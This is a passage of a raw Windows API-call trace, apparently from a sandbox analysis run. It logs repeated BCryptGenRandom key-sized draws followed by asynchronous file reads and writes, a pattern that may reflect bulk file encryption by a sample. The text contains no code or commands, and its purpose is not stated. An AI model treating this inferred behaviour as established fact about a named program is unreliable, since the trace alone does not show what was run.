lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.439] CloseHandle (hObject=0x3ac) returned 1 [0082.440] free (_Block=0x1ff1e60) [0082.444] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0082.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0082.449] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0082.449] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0082.449] free (_Block=0x1ff1e60) [0082.449] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0082.449] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0082.449] free (_Block=0x1ff1e60) [0082.449] free (_Block=0x1ff1930) [0082.450] free (_Block=0x77d800) [0082.450] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.450] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.491] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.534] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.546] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.555] ReadFile (in: hFile=0x3b4, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x6c8d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.587] CloseHandle (hObject=0x3b4) returned 1 [0082.588] free (_Block=0x3db00b8) [0082.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.601] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xeef, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.608] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1168, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.613] CloseHandle (hObject=0x3bc) returned 1 [0082.614] free (_Block=0x1ff1e60) [0082.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0082.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0082.623] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.623] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.623] free (_Block=0x77d800) [0082.623] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.625] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.625] free (_Block=0x1ff1930) [0082.625] free (_Block=0x1ff1a40) [0082.625] free (_Block=0x77d908) [0082.625] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.626] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.642] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.665] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.688] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x11ad, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.689] CloseHandle (hObject=0x3c4) returned 1 [0082.692] free (_Block=0x1fb18c0) [0082.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0082.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0082.704] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.704] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.704] free (_Block=0x77d800) [0082.704] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.704] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.704] free (_Block=0x1ff1930) [0082.704] free (_Block=0x1ff1a40) [0082.704] free (_Block=0x77d908) [0082.704] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.705] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.745] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x629b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.748] CloseHandle (hObject=0x3c4) returned 1 [0082.756] free (_Block=0x1fb18c0) [0082.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0082.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0082.768] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.768] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.768] free (_Block=0x77d800) [0082.768] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.768] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.769] free (_Block=0x1ff1930) [0082.769] free (_Block=0x1ff1a40) [0082.769] free (_Block=0x77d908) [0082.769] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.770] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.790] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x135f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0082.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0082.804] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.804] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.804] free (_Block=0x77d800) [0082.804] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.804] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.805] free (_Block=0x1ff1930) [0082.805] free (_Block=0x1ff1a40) [0082.805] free (_Block=0x77d908) [0082.805] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.806] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.902] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.944] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.990] CloseHandle (hObject=0x3b4) returned 1 [0082.990] free (_Block=0x3d70048) [0082.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.114] CloseHandle (hObject=0x3b4) returned 1 [0085.115] free (_Block=0x3d70048) [0085.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.126] WriteFile (in: hFile=0x3b8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0085.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.130] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0085.131] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.137] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.261] CloseHandle (hObject=0x3a0) returned 1 [0085.264] free (_Block=0x3e30078) [0085.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.277] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x160f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.299] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0085.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0085.316] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.316] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.316] free (_Block=0x77d800) [0085.316] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.316] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.316] free (_Block=0x1ff1930) [0085.316] free (_Block=0x1ff1a40) [0085.317] free (_Block=0x77d908) [0085.317] WriteFile (in: hFile=0x3ac, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0085.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0085.356] WriteFile 